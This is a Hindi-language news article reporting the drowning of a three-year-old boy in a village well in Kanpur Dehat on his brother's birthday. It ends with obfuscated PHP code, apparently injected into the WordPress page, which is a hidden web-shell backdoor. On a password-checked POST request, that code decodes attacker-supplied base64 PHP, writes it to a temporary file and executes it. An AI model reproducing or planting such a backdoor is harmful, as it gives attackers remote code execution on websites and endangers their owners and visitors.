पिता की आंखों के सामने कुएं में गिरा 3 वर्षीय मासूम, चार घंटे बाद बाहर निकला शव…

Uttarakhand Press News, 13 April 2023: कानपुर देहात में सट्टी थाना क्षेत्र के अफसरिया की मड़ैया गांव में बुधवार शाम को खेलते समय पिता की आंखों के सामने तीन वर्षीय मासूम कुएं में गिर गया। सूचना पर पहुंची पुलिस व दमकल कर्मियों ने मशक्कत कर करीब चार घंटे बाद शव बाहर निकाला।

अफसरिया की मड़ैया निवासी जंटर सिंह मजदूरी करते हैं। बुधवार शाम को उनका पांच बच्चों में सबसे छोटा बेटा ईशू (3) घर के सहन में खेल रहा था। अन्य परिजन घर में मौजूद थे। दरवाजे पर जंटर सिंह भी थे। इसी दौरान ईशू कुएं के पास पहुंच गया और झुक कर देखने लगा।

जंटर सिंह जब तक उसे पकड़ पाते तब तक ईशू कुएं में गिर गया। बेटे को आंखों के सामने कुएं में गिरता देख जंटर बदहवास हो गए। वह जोर जोर से चिल्लाने लगे। शोर सुनकर अन्य परिजन पहुंचे। पुलिस को सूचना दी गई। कुछ देर में पुलिस और दमकल के जवान मौके पहुंच गए।

चार घंटे बाद निकाला जा सका शव:
रेस्क्यू शुरू हुआ लेकिन कुंआ गहरा होने और पानी होने की वजह से बच्चे को जल्द निकाला नहीं जा सका। करीब चार घंटे तक मशक्कत होती रही। रस्सी के सहारे कुएं में उतरे अफसरिया निवासी जमाल उर्फ लूला ने मासूम को बाहर निकाला। इसके बाद उसे अस्पताल ले जाया गया।

शव को पोस्टमार्टम के लिए भेजा:
वहां डॉक्टर ने उसे मृत घोषित कर दिया। अनहोनी पर मां ज्योति देवी, पिता और अन्य भाई बहन बिलखने लगे। थानाध्यक्ष उमाशंकर यादव ने बताया कि शव को पोस्टमार्टम के लिए भेजा गया है। राजपुर पीएचसी अधीक्षक डॉ. डीके सिंह ने बताया कि अस्पताल लाने के पहले ही बच्चे की मौत हो चुकी थी।

बड़े भाई के जन्मदिन की खुशी मातम में बदली:
जंटर सिंह के चौथे नंबर के बेटे अबीर (4) का बुधवार को जन्मदिन था। इसके लिए घर पर खीर, गुलगुले और मिठाई बनी थी। इधर शाम को जन्मदिन मनाने की तैयारी से पहले ही अनहोनी हो गई। इससे खुशियां मातम में बदल गईं। ईशू दो बहनों व तीन भाइयों में सबसे छोटा था।

परिजन जन्मदिन की तैयारी में लगे थे:
बुधवार को बड़े भाई अबीर का जन्मदिन था। परिजन जन्मदिन की तैयारी में जुटे थे। मोहल्ले में कुछ परिवारों को चूल्हा न्योता भी दिया गया था। इधर अनहोनी हो गई। इससे खुशी के माहौल में खलल पड़ गया। भाई की मौत पर बहन नैना (12) अनुष्का (8) भाई देव बाबू (5) व अबीर(4) बिलखते रहे।

Read Previous

नौकरानी ने पुरुष साथी के साथ मिलकर किया बुजुर्ग महिला का कत्ल, फिर हुई फरार, अब गोरखपुर से गिरफ्तार

Read Next

Uttarakhand: शादी की खरीदारी करने जा रहे परिवार की कार खाई में गिरी, 2 की मौत, 3 घायल..

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}